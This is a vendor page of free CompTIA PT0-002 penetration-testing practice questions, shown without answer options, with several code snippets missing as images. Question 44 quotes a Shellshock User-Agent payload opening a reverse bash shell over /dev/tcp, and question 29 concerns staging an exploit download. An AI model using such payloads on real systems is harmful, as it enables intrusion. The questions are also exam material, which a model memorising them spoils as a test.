Free Practice Test

Free PT0-002 Exam Questions – 2025 Updated

Study Smarter for the PT0-002 Exam with Our Free and Reliable PT0-002 Exam Questions – Updated for 2025.

At Cert Empire, we are committed to delivering the latest and most accurate exam questions for students preparing for the CompTIA PT0-002 Exam. To make preparation easier, we’ve made parts of our PT0-002 exam resources free for everyone. You can practice as much as you want with Free PT0-002 Practice Test.

CompTIA PT0-002 Free Exam Questions

Disclaimer

Please keep a note that the demo questions are not frequently updated. You may as well find them in open communities around the web. However, this demo is only to depict what sort of questions you may find in our original files.

Nonetheless, the premium exam dumps files are frequently updated and are based on the latest exam syllabus and real exam questions.

1 / 61

A penetration tester ran a simple Python-based scanner. The following is a snippet of the code:

comptia pt0-002 exam demo question

 

 

 

 

 

 

 

Which of the following BEST describes why this script triggered a `probable port scan` alert in the organization's IDS?

2 / 61

A final penetration test report has been submitted to the board for review and accepted. The report has three findings rated high. Which of the following should be the NEXT step?

3 / 61

A penetration tester who is conducting a vulnerability assessment discovers that ICMP is disabled on a network segment. Which of the following could be used for a denial-of-service attack on the network segment?

4 / 61

A Chief Information Security Officer wants a penetration tester to evaluate whether a recently installed firewall is protecting a subnetwork on which many decades- old legacy systems are connected. The penetration tester decides to run an OS discovery and a full port scan to identify all the systems and any potential vulnerability. Which of the following should the penetration tester consider BEFORE running a scan?

5 / 61

Penetration-testing activities have concluded, and the initial findings have been reviewed with the client. Which of the following best describes the NEXT step in the engagement?

6 / 61

During a penetration test, a tester is in close proximity to a corporate mobile device belonging to a network administrator that is broadcasting Bluetooth frames. Which of the following is an example of a Bluesnarfing attack that the penetration tester can perform?

7 / 61

During a penetration test, a tester is able to change values in the URL from example.com/login.php?id=5 to example.com/login.php?id=10 and gain access to a web application. Which of the following vulnerabilities has the penetration tester exploited?

8 / 61

A software company has hired a security consultant to assess the security of the company's software development practices. The consultant opts to begin reconnaissance by performing fuzzing on a software binary. Which of the following vulnerabilities is the security consultant MOST likely to identify?

9 / 61

A penetration tester downloaded a Java application file from a compromised web server and identifies how to invoke it by looking at the following log:

comptia pt0-002 exam demo question

 

 

 

 

Which of the following is the order of steps the penetration tester needs to follow to validate whether the Java application uses encryption over sockets?

10 / 61

A company has hired a penetration tester to deploy and set up a rogue access point on the network. Which of the following is the BEST tool to use to accomplish this goal?

11 / 61

Which of the following should a penetration tester consider FIRST when engaging in a penetration test in a cloud environment?

12 / 61

A penetration tester found the following valid URL while doing a manual assessment of a web application: https://www.example.com/product.php?id=123987. Which of the following automated tools would be best to use NEXT to try to identify a vulnerability in this URL?

13 / 61

Which of the following protocols or technologies would in-transit confidentially protection for emailing the final security assessment report?

14 / 61

A penetration tester wants to scan a target network without being detected by the client's IDS. Which of the following scans is MOST likely to avoid detection?

15 / 61

A penetration tester who is doing a company-requested assessment would like to send traffic to another system suing double tagging.
Which of the following techniques would BEST accomplish this goal?

16 / 61

When developing a shell script intended for interpretation in Bash, the interpreter /bin/bash should be explicitly specified. Which of the following character combinations should be used on the first line of the script to accomplish this goal?

17 / 61

A penetration tester is able to capture the NTLM challenge-response traffic between a client and a server. Which of the following can be done with the pcap to gain access to the server?

18 / 61

A penetration tester has gained access to a network device that has a previously unknown IP range on an interface. Further research determines this is an always-on VPN tunnel to a third-party supplier.
Which of the following is the BEST action for the penetration tester to take?

19 / 61

A penetration tester is looking for a vulnerability that enables attackers to open doors via a specialized TCP service that is used for a physical access control system. The service exists on more than 100 different hosts, so the tester would like to automate the assessment. Identification requires the penetration tester to:
✑ Have a full TCP connection
✑ Send a `hello` payload
✑ Wait for a response
✑ Send a string of characters longer than 16 bytes
Which of the following approaches would BEST support the objective?

20 / 61

A penetration tester who is doing a security assessment discovers that a critical vulnerability is being actively exploited by cybercriminals.
Which of the following should the tester do NEXT?

21 / 61

A penetration tester has been hired to perform a physical penetration test to gain access to a secure room within a client's building. Exterior reconnaissance identifies two entrances, a WiFi guest network, and multiple security cameras connected to the Internet. Which of the following tools or techniques would BEST support additional reconnaissance?

22 / 61

A consulting company is completing the ROE during scoping. Which of the following should be included in the ROE?

23 / 61

A penetration tester writes the following script:

comptia pt0-002 exam demo question

 

 

 

 

Which of the following objectives is the tester attempting to achieve?

24 / 61

A penetration tester has been given eight business hours to gain access to a client's financial system. Which of the following techniques will have the HIGHEST likelihood of success?

25 / 61

A penetration tester wants to identify CVEs that can be leveraged to gain execution on a Linux server that has an SSHD running.
Which of the following would BEST support this task?

26 / 61

A penetration tester was brute forcing an internal web server and ran a command that produced the following output:

comptia pt0-002 exam demo question

 

 

 

 

 

 

 

 

 

 

 

However, when the penetration tester tried to browse the URL https://172.16.100.10:3000/profile, a blank page was displayed.
Which of the following is the MOST likely reason for the lack of output?

27 / 61

Which of the following is the MOST common vulnerability associated with IoT devices that are directly connected to the Internet?

28 / 61

A compliance-based penetration test is primarily concerned with:

29 / 61

A penetration tester ran the following command on a staging server: python -m SimpleHTTPServer 9891. Which of the following commands could be used to download a file named exploit to a target machine for execution?

30 / 61

A penetration tester gains access to a system and establishes persistence, and then run the following commands:

comptia pt0-002 exam demo question

 

 

 

 

Which of the following actions is the tester MOST likely performing?

31 / 61

A CentOS computer was exploited during a penetration test. During initial reconnaissance, the penetration tester discovered that port 25 was open on an internal
Sendmail server. To remain stealthy, the tester ran the following command from the attack machine:

comptia pt0-002 exam demo question

 

 

Which of the following would be the BEST command to use for further progress into the targeted network?

32 / 61

An assessor wants to run an Nmap scan as quietly as possible. Which of the following commands will give the LEAST chance of detection?

33 / 61

Which of the following situations would require a penetration tester to notify the emergency contact for the engagement?

34 / 61

Which of the following would a company's hunt team be MOST interested in seeing in a final report?

35 / 61

A security professional wants to test an IoT device by sending an invalid packet to a proprietary service listening on TCP port 3011. Which of the following would allow the security professional to easily and programmatically manipulate the TCP header length and checksum using arbitrary numbers and to observe how the proprietary service responds?

36 / 61

A penetration tester writes the following script:

comptia pt0-002 exam demo question

 

 

 

 

 

Which of the following is the tester performing?

37 / 61

A company uses a cloud provider with shared network bandwidth to host a web application on dedicated servers. The company's contact with the cloud provider prevents any activities that would interfere with the cloud provider's other customers. When engaging with a penetration-testing company to test the application, which of the following should the company avoid?

38 / 61

Which of the following situations would MOST likely warrant revalidation of a previous security assessment?

39 / 61

Which of the following assessment methods is MOST likely to cause harm to an ICS environment?

40 / 61

Which of the following tools would be MOST useful in collecting vendor and other security-relevant information for IoT devices to support passive reconnaissance?

41 / 61

A penetration tester runs the unshadow command on a machine. Which of the following tools will the tester most likely use NEXT?

42 / 61

A company hired a penetration-testing team to review the cyber-physical systems in a manufacturing plant. The team immediately discovered the supervisory systems and PLCs are both connected to the company intranet.
Which of the following assumptions, if made by the penetration-testing team, is MOST likely to be valid?

43 / 61

When planning a penetration-testing effort, clearly expressing the rules surrounding the optimal time of day for test execution is important because:

44 / 61

A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code: exploit = {`User-Agent`: `() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1`, `Accept`: `text/html,application/ xhtml+xml,application/xml`}
Which of the following edits should the tester make to the script to determine the user context in which the server is being run?

45 / 61

A penetration tester has been contracted to review wireless security. The tester has deployed a malicious wireless AP that mimics the configuration of the target enterprise WiFi. The penetration tester now wants to try to force nearby wireless stations to connect to the malicious AP.
Which of the following steps should the tester take NEXT?

46 / 61

A penetration tester is attempting to discover live hosts on a subnet quickly. Which of the following commands will perform a ping scan?

47 / 61

A penetration tester has been given an assignment to attack a series of targets in the 192.168.1.0/24 range, triggering as few alarms and countermeasures as possible.
Which of the following Nmap scan syntaxes would BEST accomplish this objective?

48 / 61

A security company has been contracted to perform a scoped insider-threat assessment to try to gain access to the human resources server that houses PII and salary data. The penetration testers have been given an internal network starting position.
Which of the following actions, if performed, would be ethical within the scope of the assessment?

49 / 61

In an unprotected network file repository, a penetration tester discovers a text file containing usernames and passwords in cleartext and a spreadsheet containing data for 50 employees, including full names, roles, and serial numbers. The tester realizes some of the passwords in the text file follow the format: .
Which of the following would be the best action for the tester to take NEXT with this information?

50 / 61

A red team gained access to the internal network of a client during an engagement and used the Responder tool to capture important data.
Which of the following was captured by the testing team?

51 / 61

A penetration tester received a .pcap file to look for credentials to use in an engagement. Which of the following tools should the tester utilize to open and read the .pcap file?

52 / 61

Performing a penetration test against an environment with SCADA devices brings an additional safety risk because the:

53 / 61

A company's Chief Executive Officer has created a secondary home office and is concerned that the WiFi service being used is vulnerable to an attack. A penetration tester is hired to test the security of the WiFi's router.
Which of the following is MOST vulnerable to a brute-force attack?

54 / 61

A penetration tester has established an on-path attack position and must now specially craft a DNS query response to be sent back to a target host.
Which of the following utilities would BEST support this objective?

55 / 61

A new client hired a penetration-testing company for a month-long contract for various security assessments against the client's new service. The client is expecting to make the new service publicly available shortly after the assessment is complete and is planning to fix any findings, except for critical issues, after the service is made public. The client wants a simple report structure and does not want to receive daily findings.
Which of the following is most important for the penetration tester to define FIRST?

56 / 61

A Chief Information Security Officer wants a penetration tester to evaluate the security awareness level of the company's employees.
Which of the following tools can help the tester achieve this goal?

57 / 61

A penetration tester is scanning a corporate lab network for potentially vulnerable services.
Which of the following Nmap commands will return vulnerable ports that might be interesting to a potential attacker?

58 / 61

An Nmap scan shows open ports on web servers and databases. A penetration tester decides to run WPScan and SQLmap to identify vulnerabilities and additional information about those systems.
Which of the following is the penetration tester trying to accomplish?

59 / 61

Which of the following commands will allow a penetration tester to permit a shell script to be executed by the file owner?

60 / 61

Which of the following is MOST important to include in the final report of a static application-security test that was written with a team of application developers as the intended audience?

61 / 61

A company obtained permission for a vulnerability scan from its cloud service provider and now wants to test the security of its hosted data. Which of the following should the tester verify FIRST to assess this risk?

Your score is

The average score is 43%

Shopping Cart
Scroll to Top

FLASH OFFER

Days
Hours
Minutes
Seconds

avail $6 DISCOUNT on YOUR PURCHASE